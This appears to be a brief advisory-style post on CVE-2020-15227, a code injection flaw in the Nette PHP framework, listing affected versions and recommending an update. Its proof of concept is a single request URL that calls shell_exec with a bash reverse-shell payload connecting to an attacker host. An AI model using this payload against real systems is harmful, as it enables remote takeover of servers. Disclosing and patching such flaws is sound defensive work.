Nette Framework: CVE-2020-15227

less than 1 minute read

Nette Framework:

Nette Framework is an open-source framework for creating web applications in PHP 5 and 7. It supports AJAX, DRY, KISS, MVC and code reusability. Original author of the framework is David Grudl, but further development is now maintained by the Nette Foundation organization. Nette is a free software released under both[2] the New BSD license and the GNU GPL version 2 or 3.

Issue Description:

Packages nette/application versions prior to 2.2.10, 2.3.14, 2.4.16, 3.0.6 and nette/nette versions prior to 2.0.19 and 2.1.13 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE.

Thanks to Cyku Hong

Proof of Concept:

/nette.micro?callback=shell_exec&cmd=bash%20-i%20>&%20/dev/tcp/'+lhost+'/'+lport+'0>&1

Impact:

Code injection, possible remote code execution.

Recommendation:

Update Nette Framework to the latest version.